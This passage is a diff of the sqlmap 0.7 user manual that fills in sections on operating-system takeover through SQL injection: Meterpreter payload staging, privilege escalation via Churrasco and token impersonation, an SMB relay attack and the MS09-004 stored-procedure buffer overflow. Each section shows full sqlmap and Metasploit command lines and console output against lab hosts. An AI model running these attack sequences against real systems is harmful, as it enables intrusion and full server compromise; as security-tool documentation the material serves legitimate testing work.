Encoder +[3] Alpha2 Alphanumeric Uppercase Encoder +[4] Avoid UTF8/tolower +[5] Call+4 Dword XOR Encoder +[6] Single-byte XOR Countdown Encoder +[7] Variable-length Fnstenv/mov Dword XOR Encoder +[8] Polymorphic Jump/Call XOR Additive Feedback Encoder +[9] Non-Alpha Encoder +[10] Non-Upper Encoder +[11] Polymorphic XOR Additive Feedback Encoder (default) +[12] Alpha2 Alphanumeric Unicode Mixedcase Encoder +[13] Alpha2 Alphanumeric Unicode Uppercase Encoder +> 11 +[hh:mm:24] [INFO] creation in progress .................. done +[hh:mm:42] [INFO] compression in progress . quit unexpectedly with return code 1 +[hh:mm:43] [INFO] failed to compress the file because you provided a Metasploit version +above 3.3-dev revision 6681. This will not inficiate the correct execution of sqlmap. +It might only slow down a bit the execution of sqlmap +[hh:mm:43] [INFO] uploading payload stager to 'C:/WINDOWS/Temp/sqlmapmsfgcpge.exe' +[hh:mm:44] [INFO] running Metasploit Framework 3 command line interface locally, wait.. +[hh:mm:44] [INFO] running Metasploit Framework 3 payload stager remotely, wait.. +[*] Please wait while we load the module tree... +[*] Started bind handler +[*] Starting the payload handler... +[*] Transmitting intermediate stager for over-sized stage...(216 bytes) +[*] Sending stage (718336 bytes) +[*] Meterpreter session 1 opened (192.168.1.161:47832 -> 192.168.1.121:61588) + +meterpreter > Loading extension priv...success. +meterpreter > getuid +Server username: NT AUTHORITY\SYSTEM +meterpreter > ipconfig + +MS TCP Loopback interface +Hardware MAC: 00:00:00:00:00:00 +IP Address : 127.0.0.1 +Netmask : 255.0.0.0 + + + +VMware Accelerated AMD PCNet Adapter +Hardware MAC: 00:0c:29:29:ee:86 +IP Address : 192.168.1.121 +Netmask : 255.255.255.0 + + +meterpreter > pwd +C:\Program Files\MySQL\MySQL Server 5.0\Data +meterpreter > exit + + +

+By default MySQL on Windows runs as SYSTEM, however PostgreSQL +run as a low-privileged user postgres on both Windows and Linux. +Microsoft SQL Server 2000 by default runs as SYSTEM, whereas +Microsoft SQL Server 2005 and 2008 run most of the times as NETWORK +SERVICE and sometimes as LOCAL SERVICE. + +It is possible to provide sqlmap with the --priv-esc option to +abuse Windows access tokens and escalate privileges to SYSTEM +within the Meterpreter session created if the underlying operating system +is not patched against Microsoft Security Bulletin +. +sqlmap performs the + +technique by uploading +local exploit and using it to call the Metasploit's payload stager +executable. sqlmap uses also the Metasploit's Meterpreter + +extension to abused Windows access tokens in conjunction to Churrasco +stand-alone exploit if the user wants so. + +

+Note that this feature is not supported by sqlmap installed from the +DEB package because it relies on Churrasco, which is not explicitly free +software so it has not been included in the package. + +

+This technique is detailed on the white paper +. + +

+Example on a Microsoft SQL Server 2005 Service Pack 0 running as +NETWORK SERVICE on the target: + + +$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mssql/iis/get_str2.asp?name=luther" \ + --os-pwn -v 1 --msf-path /home/inquis/software/metasploit --priv-esc + +[...] +[hh:mm:17] [INFO] the back-end DBMS is Microsoft SQL Server +web server operating system: Windows 2000 +web application technology: ASP.NET, Microsoft IIS 6.0, ASP +back-end DBMS: Microsoft SQL Server 2005 + +[hh:mm:17] [INFO] testing stacked queries support on parameter 'name' +[hh:mm:22] [INFO] the web application supports stacked queries on parameter 'name' +[hh:mm:22] [INFO] testing if current user is DBA +[hh:mm:22] [INFO] retrieved: 1 +[hh:mm:23] [INFO] checking if xp_cmdshell extended procedure is available, wait.. +[hh:mm:29] [INFO] xp_cmdshell extended procedure is available +[hh:mm:29] [INFO] creating Metasploit Framework 3 payload stager +which connection type do you want to use? +[1] Bind TCP (default) +[2] Bind TCP (No NX) +[3] Reverse TCP +[4] Reverse TCP (No NX) +> 3 +which is the local address? [192.168.1.161] +which local port numer do you want to use? [61499] +[hh:mm:54] [INFO] forcing Metasploit payload to Meterpreter because it is the only payload +that can be used to abuse Windows Impersonation Tokens via Meterpreter 'incognito' +extension to privilege escalate +which payload encoding do you want to use? +[1] No Encoder +[2] Alpha2 Alphanumeric Mixedcase Encoder +[3] Alpha2 Alphanumeric Uppercase Encoder +[4] Avoid UTF8/tolower +[5] Call+4 Dword XOR Encoder +[6] Single-byte XOR Countdown Encoder +[7] Variable-length Fnstenv/mov Dword XOR Encoder +[8] Polymorphic Jump/Call XOR Additive Feedback Encoder +[9] Non-Alpha Encoder +[10] Non-Upper Encoder +[11] Polymorphic XOR Additive Feedback Encoder (default) +[12] Alpha2 Alphanumeric Unicode Mixedcase Encoder +[13] Alpha2 Alphanumeric Unicode Uppercase Encoder +> +[hh:mm:58] [INFO] creation in progress .................. done +[hh:mm:16] [INFO] compression in progress . quit unexpectedly with return code 1 +[hh:mm:17] [INFO] failed to compress the file because you provided a Metasploit version +above 3.3-dev revision 6681. This will not inficiate the correct execution of sqlmap. +It might only slow down a bit the execution of sqlmap +[hh:mm:17] [INFO] uploading payload stager to 'C:/WINDOWS/Temp/sqlmapmsfyahls.exe' +[hh:mm:20] [WARNING] often Microsoft SQL Server 2005 runs as Network Service which has no +Windows Impersonation Tokens within all threads, this makes Meterpreter's incognito +extension to fail to list tokens +do you want sqlmap to upload Churrasco and call the Metasploit payload stager as its +argument so that it will be started as SYSTEM? [Y/n] y +[hh:mm:36] [INFO] the binary file is bigger than 65280 bytes. sqlmap will split it into +chunks, upload them and recreate the original file out of the binary chunks server-side, +wait.. +[hh:mm:22] [INFO] file chunk 1 written +[14:10:06] [INFO] file chunk 2 written +[14:10:06] [INFO] running Metasploit Framework 3 command line interface locally, wait.. +[*] Please wait while we load the module tree... +[*] Handler binding to LHOST 0.0.0.0 +[*] Started reverse handler +[*] Starting the payload handler... +[14:10:31] [INFO] running Metasploit Framework 3 payload stager remotely, wait.. +[*] Transmitting intermediate stager for over-sized stage...(216 bytes) +[*] Sending stage (718336 bytes) +[*] Meterpreter session 1 opened (192.168.1.161:61499 -> 192.168.1.131:3221) + +meterpreter > +[14:11:01] [INFO] loading Meterpreter 'incognito' extension and displaying the list of +Access Tokens availables. Choose which user you want to impersonate by using incognito's +command 'impersonate_token' +Loading extension priv...success. +meterpreter > Loading extension incognito...success. +meterpreter > Server username: NT AUTHORITY\SYSTEM +meterpreter > +Delegation Tokens Available +======================================== +NT AUTHORITY\LOCAL SERVICE +NT AUTHORITY\NETWORK SERVICE +NT AUTHORITY\SYSTEM +W2K3DEV\Administrator +W2K3DEV\IUSR_WIN2003 +W2K3DEV\postgres + +Impersonation Tokens Available +======================================== +NT AUTHORITY\ANONYMOUS LOGON + +meterpreter > getuid +Server username: NT AUTHORITY\SYSTEM +meterpreter > exit + + One click prompt for an out-of-band shell, meterpreter or VNC @@ -4009,12 +4603,158 @@ The techniques implemented are detailed on the white paper Options: --os-smbrelay, --priv-esc and --msf-path

-TODO +If the back-end database management system runs as Administrator +and the underlying operating system is not patched against Microsoft +Security Bulletin , +sqlmap can abuse the universal naming convention (UNC) supported within +all database management systems to force the database server to initiate a +SMB connection with the attacker host, then perform a SMB authentication +relay attack in order to establish a high-privileged out-of-band TCP +stateful channel between the attacker host and the target database +server. +sqlmap relies on 's SMB relay exploit to perform this attack, so you need +to have it already on your system: it's free and can be downloaded from the +homepage. +You need to run sqlmap as root user if you want to perform a SMB +relay attack because it will need to listen on a user-specified SMB TCP +port for incoming connection attempts.

-The techniques implemented are detailed on the white paper +Note that this feature is not supported by sqlmap running on Windows +because Metasploit's msfconsole and msfcli are not supported on the native +Windows Ruby interpreter. + +

+This technique is detailed on the white paper . +

+Example on a Microsoft SQL Server 2005 Service Pack 0 running as +Administrator on the target: + + +$ sudo python sqlmap.py -u "http://192.168.1.121/sqlmap/mssql/iis/get_str2.asp?name=luther" \ + --os-smbrelay -v 1 --msf-path /home/inquis/software/metasploit + +[...] +[hh:mm:11] [INFO] the back-end DBMS is Microsoft SQL Server +web server operating system: Windows 2000 +web application technology: ASP.NET, Microsoft IIS 6.0, ASP +back-end DBMS: Microsoft SQL Server 2005 + +[hh:mm:11] [INFO] testing stacked queries support on parameter 'name' +[hh:mm:16] [INFO] the web application supports stacked queries on parameter 'name' +[hh:mm:16] [WARNING] it is unlikely that this attack will be successful because often +Microsoft SQL Server 2005 runs as Network Service which is not a real user, it does not +send the NTLM session hash when connecting to a SMB service +[hh:mm:16] [INFO] which connection type do you want to use? +[1] Bind TCP (default) +[2] Bind TCP (No NX) +[3] Reverse TCP +[4] Reverse TCP (No NX) +> 1 +[hh:mm:16] [INFO] which is the local address? [192.168.1.161] 192.168.1.161 +[hh:mm:16] [INFO] which is the back-end DBMS address? [192.168.1.131] 192.168.1.131 +[hh:mm:16] [INFO] which remote port numer do you want to use? [4907] 4907 +[hh:mm:16] [INFO] which payload do you want to use? +[1] Reflective Meterpreter (default) +[2] PatchUp Meterpreter (only from Metasploit development revision 6742) +[3] Shell +[4] Reflective VNC +[5] PatchUp VNC (only from Metasploit development revision 6742) +> 1 +[hh:mm:16] [INFO] which SMB port do you want to use? +[1] 139/TCP (default) +[2] 445/TCP +> 1 +[hh:mm:16] [INFO] running Metasploit Framework 3 console locally, wait.. + + _ _ _ _ + | | | | (_) | + _ __ ___ ___| |_ __ _ ___ _ __ | | ___ _| |_ +| '_ ` _ \ / _ \ __/ _` / __| '_ \| |/ _ \| | __| +| | | | | | __/ || (_| \__ \ |_) | | (_) | | |_ +|_| |_| |_|\___|\__\__,_|___/ .__/|_|\___/|_|\__| + | | + |_| + + + =[ msf v3.3-dev ++ -- --=[ 392 exploits - 234 payloads ++ -- --=[ 20 encoders - 7 nops + =[ 168 aux + +resource> use windows/smb/smb_relay +resource> set SRVHOST 192.168.1.161 +SRVHOST => 192.168.1.161 +resource> set SRVPORT 139 +SRVPORT => 139 +resource> set PAYLOAD windows/meterpreter/bind_tcp +PAYLOAD => windows/meterpreter/bind_tcp +resource> set LPORT 4907 +LPORT => 4907 +resource> set RHOST 192.168.1.131 +RHOST => 192.168.1.131 +resource> exploit +[*] Exploit running as background job. +msf exploit(smb_relay) > +[*] Started bind handler +[*] Server started. +[*] Received 192.168.1.131:3242 \ LMHASH:00 NTHASH: OS:Windows Server 2003 3790 +Service Pack 2 LM: +[*] Sending Access Denied to 192.168.1.131:3242 \ +[*] Received 192.168.1.131:3242 W2K3DEV\Administrator LMHASH:FOO NTHASH:BAR OS:Windows +Server 2003 3790 Service Pack 2 LM: +[*] Authenticating to 192.168.1.131 as W2K3DEV\Administrator... +[*] AUTHENTICATED as W2K3DEV\Administrator... +[*] Connecting to the ADMIN$ share... +[*] Regenerating the payload... +[*] Uploading payload... +[*] Created \wELRmcmd.exe... +[*] Connecting to the Service Control Manager... +[*] Obtaining a service manager handle... +[*] Creating a new service... +[*] Closing service handle... +[*] Opening service... +[*] Starting the service... +[*] Removing the service... +[*] Closing service handle... +[*] Deleting \wELRmcmd.exe... +[*] Sending Access Denied to 192.168.1.131:3242 W2K3DEV\Administrator +[*] Transmitting intermediate stager for over-sized stage...(216 bytes) +[*] Received 192.168.1.131:3244 \ LMHASH:00 NTHASH: OS:Windows Server 2003 3790 +Service Pack 2 LM: +[*] Sending Access Denied to 192.168.1.131:3244 \ +[*] Received 192.168.1.131:3244 W2K3DEV\Administrator LMHASH:FOO NTHASH:BAR OS:Windows +Server 2003 3790 Service Pack 2 LM: +[*] Authenticating to 192.168.1.131 as W2K3DEV\Administrator... +[*] AUTHENTICATED as W2K3DEV\Administrator... +[*] Ignoring request from 192.168.1.131, attack already in progress. +[*] Sending Access Denied to 192.168.1.131:3244 W2K3DEV\Administrator +[*] Sending stage (718336 bytes) +[*] Meterpreter session 1 opened (192.168.1.161:51813 -> 192.168.1.131:4907) + +Active sessions +=============== + + Id Description Tunnel + -- ----------- ------ + 1 Meterpreter 192.168.1.161:51813 -> 192.168.1.131:4907 + +msf exploit(smb_relay) > [*] Starting interaction with 1... + +meterpreter > [-] The 'priv' extension has already been loaded. +meterpreter > getuid +Server username: NT AUTHORITY\SYSTEM +meterpreter > exit + +[*] Meterpreter session 1 closed. +msf exploit(smb_relay) > exit + +[*] Server stopped. + + Stored procedure buffer overflow exploitation @@ -4022,12 +4762,104 @@ The techniques implemented are detailed on the white paper Options: --os-bof, --priv-esc and --msf-path

-TODO +If the back-end database management system is not patched against Microsoft +Security Bulletin , +sqlmap can exploit the heap-based buffer overflow affecting +sp_replwritetovarbin stored procedure in order to establish an +out-of-band TCP stateful channel between the attacker host and the +target database server. +sqlmap has its own exploit to trigger the vulnerability, but it relies on + to +generate the shellcode used within the exploit, so you need to have it +already on your system: it's free and can be downloaded from the homepage.

-The techniques implemented are detailed on the white paper +Note that this feature is not supported by sqlmap running on Windows +because Metasploit's msfconsole and msfcli are not supported on the native +Windows Ruby interpreter. + +

+This technique is detailed on the white paper . +

+Example on a Microsoft SQL Server 2005 Service Pack 0 target: + + +$ sudo python sqlmap.py -u "http://192.168.1.121/sqlmap/mssql/iis/get_str2.asp?name=luther" \ + --os-bof -v 1 --msf-path /home/inquis/software/metasploit + +[...] +[hh:mm:09] [INFO] the back-end DBMS is Microsoft SQL Server +web server operating system: Windows 2000 +web application technology: ASP.NET, Microsoft IIS 6.0, ASP +back-end DBMS: Microsoft SQL Server 2005 + +[hh:mm:09] [INFO] testing stacked queries support on parameter 'name' +[hh:mm:14] [INFO] the web application supports stacked queries on parameter 'name' +[hh:mm:14] [INFO] going to exploit the Microsoft SQL Server 2005 'sp_replwritetovarbin' +stored procedure heap-based buffer overflow (MS09-004) +[hh:mm:14] [INFO] fingerprinting the back-end DBMS operating system version and service pack +[hh:mm:14] [INFO] retrieved: 1 +[hh:mm:15] [INFO] retrieved: 1 +[hh:mm:15] [INFO] the back-end DBMS operating system is Windows 2003 Service Pack 2 +[hh:mm:15] [INFO] testing if current user is DBA +[hh:mm:15] [INFO] retrieved: 1 +[hh:mm:15] [INFO] checking if xp_cmdshell extended procedure is available, wait.. +[hh:mm:21] [INFO] xp_cmdshell extended procedure is available +[hh:mm:21] [INFO] creating Metasploit Framework 3 multi-stage shellcode for the exploit +which connection type do you want to use? +[1] Bind TCP (default) +[2] Bind TCP (No NX) +[3] Reverse TCP +[4] Reverse TCP (No NX) +> +which is the back-end DBMS address? [192.168.1.131] +which remote port numer do you want to use? [39391] 62719 +which payload do you want to use? +[1] Reflective Meterpreter (default) +[2] PatchUp Meterpreter (only from Metasploit development revision 6742) +[3] Shell +[4] Reflective VNC +[5] PatchUp VNC (only from Metasploit development revision 6742) +> +which payload encoding do you want to use? +[1] No Encoder +[2] Alpha2 Alphanumeric Mixedcase Encoder +[3] Alpha2 Alphanumeric Uppercase Encoder +[4] Avoid UTF8/tolower +[5] Call+4 Dword XOR Encoder +[6] Single-byte XOR Countdown Encoder +[7] Variable-length Fnstenv/mov Dword XOR Encoder +[8] Polymorphic Jump/Call XOR Additive Feedback Encoder +[9] Non-Alpha Encoder +[10] Non-Upper Encoder +[11] Polymorphic XOR Additive Feedback Encoder (default) +[12] Alpha2 Alphanumeric Unicode Mixedcase Encoder +[13] Alpha2 Alphanumeric Unicode Uppercase Encoder +> +[hh:mm:50] [INFO] creation in progress .................. done +[hh:mm:08] [INFO] handling DEP +[hh:mm:08] [INFO] the back-end DBMS underlying operating system supports DEP: going to +handle it +[hh:mm:08] [INFO] checking DEP system policy +[hh:mm:09] [INFO] retrieved: OPTIN +[hh:mm:12] [INFO] only Windows system binaries are covered by DEP by default +[hh:mm:12] [INFO] running Metasploit Framework 3 command line interface locally, wait.. +[hh:mm:12] [INFO] triggering the buffer overflow vulnerability, wait.. +[*] Please wait while we load the module tree... +[*] Started bind handler +[*] Starting the payload handler... +[*] Transmitting intermediate stager for over-sized stage...(216 bytes) +[*] Sending stage (718336 bytes) +[*] Meterpreter session 1 opened (192.168.1.161:33765 -> 192.168.1.131:62719) + +meterpreter > Loading extension priv...success. +meterpreter > getuid +Server username: NT AUTHORITY\NETWORK SERVICE +meterpreter > exit + + Miscellaneous @@ -4123,7 +4955,7 @@ Option: --update

It is possible to update sqlmap to the latest stable version available on -its by running it with the --update option. @@ -4140,7 +4972,7 @@ $ python sqlmap.py --update -v 4 [hh:mm:55] [TRAFFIC OUT] HTTP request: GET /doc/VERSION HTTP/1.1 Host: sqlmap.sourceforge.net -User-agent: sqlmap/0.7rc1 (http://sqlmap.sourceforge.net) +User-agent: sqlmap/0.7 (http://sqlmap.sourceforge.net) Connection: close [hh:mm:55] [TRAFFIC IN] HTTP response (OK - 200): @@ -4159,7 +4991,7 @@ X-Pad: avoid browser bug [hh:mm:56] [TRAFFIC OUT] HTTP request: GET /FAQs/SQLServerVersionDatabase/tabid/63/Default.aspx HTTP/1.1 Host: www.sqlsecurity.com -User-agent: sqlmap/0.7rc1 (http://sqlmap.sourceforge.net) +User-agent: sqlmap/0.7 (http://sqlmap.sourceforge.net) Cookie: .ASPXANONYMOUS=dvus03cqyQEkAAAANDI0M2QzZmUtOGRkOS00ZDQxLThhMTUtN2ExMWJiNWVjN2My0; language=en-US Connection: close @@ -4478,7 +5310,32 @@ vulnerable parameter which is the default behaviour. Option: --cleanup

-This paragraph will be written for sqlmap 0.7 stable version, refer to the white paper for the moment. +It is recommended to clean up the back-end database management system from +sqlmap temporary tables and created user-defined functions when you are +done with owning the underlying operating system or file system. + +

+Example on a PostgreSQL 8.3.5 target: + + +$ python sqlmap.py -u "http://192.168.1.121/sqlmap/pgsql/iis/get_int.aspx?id=1" \ + -v 2 --cleanup + +[...] +[hh:mm:18] [INFO] cleaning up the database management system +[hh:mm:18] [DEBUG] removing support tables +[hh:mm:18] [DEBUG] query: DROP TABLE sqlmapfile +[hh:mm:18] [DEBUG] query: DROP TABLE sqlmapoutput +do you want to remove sys_exec UDF? [Y/n] +[hh:mm:20] [DEBUG] removing sys_exec UDF +[hh:mm:20] [DEBUG] query: DROP FUNCTION sys_exec(text) +do you want to remove sys_eval UDF? [Y/n] +[hh:mm:21] [DEBUG] removing sys_eval UDF +[hh:mm:21] [DEBUG] query: DROP FUNCTION sys_eval(text) +[hh:mm:21] [INFO] database management system cleanup finished +[hh:mm:21] [WARNING] remember that UDF shared library files saved on the file system can +only be deleted manually + Disclaimer